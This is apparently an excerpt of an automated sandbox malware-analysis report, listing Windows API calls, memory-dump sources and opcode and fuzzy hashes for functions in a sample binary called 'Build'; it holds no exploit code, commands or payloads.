                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                    • String ID:
                                                                                                    • API String ID: 1915507550-0
                                                                                                    • Opcode ID: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                                                                                    • Instruction ID: 08fd73a10bff1973a8e2128898dbe9f3b216bb940aea6e5fcb3e0f58c1551b3d
                                                                                                    • Opcode Fuzzy Hash: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                                                                                    • Instruction Fuzzy Hash: B1D0A770214608B6DF012B20CC02E7E7698DB40340F0084217801E5140EEB1DA506F51
                                                                                                    APIs
                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 009401A4
                                                                                                      • Part of subcall function 0093D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0093D875
                                                                                                      • Part of subcall function 0093D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093D886
                                                                                                      • Part of subcall function 0093D864: IsDialogMessageW.USER32(00010458,?), ref: 0093D89A
                                                                                                      • Part of subcall function 0093D864: TranslateMessage.USER32(?), ref: 0093D8A8
                                                                                                      • Part of subcall function 0093D864: DispatchMessageW.USER32(?), ref: 0093D8B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 897784432-0
                                                                                                    • Opcode ID: 066fe6941f34da81b86a64d47cad508e69e5b8cd5dbf54299627492552591baa
                                                                                                    • Instruction ID: 95010ac5bdc50be784c65889965dbf7ff9566abcf4d1c1ecad2758398e15bf68
                                                                                                    • Opcode Fuzzy Hash: 066fe6941f34da81b86a64d47cad508e69e5b8cd5dbf54299627492552591baa
                                                                                                    • Instruction Fuzzy Hash: DFD09E71158300AAD6012B51DD06F1A7AA2BB98B05F004554B384340F186629D21BF16
                                                                                                    APIs
                                                                                                    • DloadProtectSection.DELAYIMP ref: 00940AC0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DloadProtectSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 2203082970-0
                                                                                                    • Opcode ID: 57c85f33d4c5e5342ecb03db43b7720331788f245c32dde5c47cac279d7d395d
                                                                                                    • Instruction ID: 27f974821afb64bd642022f58aa02dee9fcc56b4a0c4a57b43189db24d4effd9
                                                                                                    • Opcode Fuzzy Hash: 57c85f33d4c5e5342ecb03db43b7720331788f245c32dde5c47cac279d7d395d
                                                                                                    • Instruction Fuzzy Hash: F1D0C93051971499C611BB649C9EF643298B3D870DB960800BB45962D5C7B86498E709
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: d8f11dd8c7b26c1bcaedb305552e69af5bdae4535988c5669ae60fd8d4bb6d6e
                                                                                                    • Instruction ID: af83c56a3c18633365401d9b30d11a1abd4a3e324a38198ee45546fb39aec0da
                                                                                                    • Opcode Fuzzy Hash: d8f11dd8c7b26c1bcaedb305552e69af5bdae4535988c5669ae60fd8d4bb6d6e
                                                                                                    • Instruction Fuzzy Hash: 34D0C970418211CFD3608F39E404782BBE4EF08311B11882E90C9C2160E6705880CF40
                                                                                                    APIs
                                                                                                    • GetFileType.KERNELBASE(000000FF,0092B18A,?,?,?,00000000,0092B662,?,?,00000000,?,?), ref: 0092B294
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileType
                                                                                                    • String ID:
                                                                                                    • API String ID: 3081899298-0
                                                                                                    • Opcode ID: 2df22485ecf612bd99d09dc143f1ae99ae22ec2521ecf49c62c15313b758dd3c
                                                                                                    • Instruction ID: 9336fff235d5793e73b553907ec06f15f4249b8584039897e373f5489ce81dd1
                                                                                                    • Opcode Fuzzy Hash: 2df22485ecf612bd99d09dc143f1ae99ae22ec2521ecf49c62c15313b758dd3c
                                                                                                    • Instruction Fuzzy Hash: BBC01234000324D68E304A39A84909C73A6AE623B77B88298C0388A0AAC3238C83FA10
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 12d3950578033b5c6e348ce6975c06006f8c08792174ae8a2be50daf2ba3eaa6
                                                                                                    • Instruction ID: 13926485dd7e66ec38816bc09ea48fbcf136825c6a34f2d69d711f5e88c6c9ab
                                                                                                    • Opcode Fuzzy Hash: 12d3950578033b5c6e348ce6975c06006f8c08792174ae8a2be50daf2ba3eaa6
                                                                                                    • Instruction Fuzzy Hash: 8BB0128635D202BC3114B1D99E17D3F015CC0C0B293318F3AF90AC1180E4645C090332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: b1440fe518bc59a6d94858ec1c54a724be9ba8693057b2acbf58a70dd241059c
                                                                                                    • Instruction ID: fe93afcc109037b67acc703fb12bb50d27ed7bcc82e3b807ad0c1801322a66ad
                                                                                                    • Opcode Fuzzy Hash: b1440fe518bc59a6d94858ec1c54a724be9ba8693057b2acbf58a70dd241059c
                                                                                                    • Instruction Fuzzy Hash: 97B0128A35D302AC3654B1995D57D3F014CC0C0B293318E3AF509C1280F4645C484332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 67455476753b6483865f84384234220dff0153df9c1b0f8a53cbcb660555a17a
                                                                                                    • Instruction ID: ccfe6586520f2a8c668aab16e435b235255d54c82dab60446b6b18fc1a22b517
                                                                                                    • Opcode Fuzzy Hash: 67455476753b6483865f84384234220dff0153df9c1b0f8a53cbcb660555a17a
                                                                                                    • Instruction Fuzzy Hash: 0FB0128636D302BC3114B1999D17D3F015CD0C0F293318E3BF50AC1180E4645C080332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: bb386a209e56f3edaa13fe7123d8c94e18efddc5768ae6efb708af60e9f1e96a
                                                                                                    • Instruction ID: ed4f8667bff1e57d3c9f816b5b800d420be28af182d45bf838df8c17b3717ea6
                                                                                                    • Opcode Fuzzy Hash: bb386a209e56f3edaa13fe7123d8c94e18efddc5768ae6efb708af60e9f1e96a
                                                                                                    • Instruction Fuzzy Hash: 03B0128A35D302AC3114B1995D17D3F014CC0C0B29331CD3AF909C1280E4646C080332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 85a438f138b364b3088894a340423b38b0db90e4d570f9ae74ab01440037cfea
                                                                                                    • Instruction ID: 05817f64f1f0cbff503ab33bd4c9cf66bc19d8f8e9e72f393a1e1c90a75944ff
                                                                                                    • Opcode Fuzzy Hash: 85a438f138b364b3088894a340423b38b0db90e4d570f9ae74ab01440037cfea
                                                                                                    • Instruction Fuzzy Hash: 53B0128635D203AC3118B5995D17D3F014CC0C0B29331CD3AF909C1280E4645C0C0332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: fe46f06c7afc144a7f3437f2841be7bce5d0b418af6a37d58499bdb9a8f0dfa8
                                                                                                    • Instruction ID: 67f8b3f8d2a106db5885d141bc7c92131ba3865339cf3e55a9519b1135a943d8
                                                                                                    • Opcode Fuzzy Hash: fe46f06c7afc144a7f3437f2841be7bce5d0b418af6a37d58499bdb9a8f0dfa8
                                                                                                    • Instruction Fuzzy Hash: ADB0128635D342AC3258B1995D17D3F014CC0C0B29331CE3AF509C1280E4645C4C0332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 315015a7864037918ad8fc517bdefa59d8fcab62e7034f4a5eca87cdefbb2900
                                                                                                    • Instruction ID: 5ddd70d2ed6a078c789d3b3db5ddf92f3f8a97cd8afe6a82be8a10bca03ceb8d
                                                                                                    • Opcode Fuzzy Hash: 315015a7864037918ad8fc517bdefa59d8fcab62e7034f4a5eca87cdefbb2900
                                                                                                    • Instruction Fuzzy Hash: 78B0128A35D302AC3114B1995D17D3F014CD0C0F293318D3AF509C1280E4645C080332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: ee49fb03d95abb97a3fb91a5388828aefce9ec2f7fefde1ddb13082700fab20c
                                                                                                    • Instruction ID: 0599151d1c6f1186d01e0fd3a0e58b2533bdc5dc8ee543e5a992a824a6f08b65
                                                                                                    • Opcode Fuzzy Hash: ee49fb03d95abb97a3fb91a5388828aefce9ec2f7fefde1ddb13082700fab20c
                                                                                                    • Instruction Fuzzy Hash: 72B0128635D202EC3118B1E95D17D3F014CD0C0F29331CD3AF509C1280E4645C0C0332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: a0e9337d3306ece94c1dac0e5e19e1b0e953404a8c698c6b0eeb7f45c312db72
                                                                                                    • Instruction ID: b60dfb72a46281312b7c9e5a170656e3b7dcc820ab47d1caddef4039663ed47a
                                                                                                    • Opcode Fuzzy Hash: a0e9337d3306ece94c1dac0e5e19e1b0e953404a8c698c6b0eeb7f45c312db72
                                                                                                    • Instruction Fuzzy Hash: 44B0129635D202AC3114B1995D17D3F014CC0C1B29331CD3AF909C1180E4645C080332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
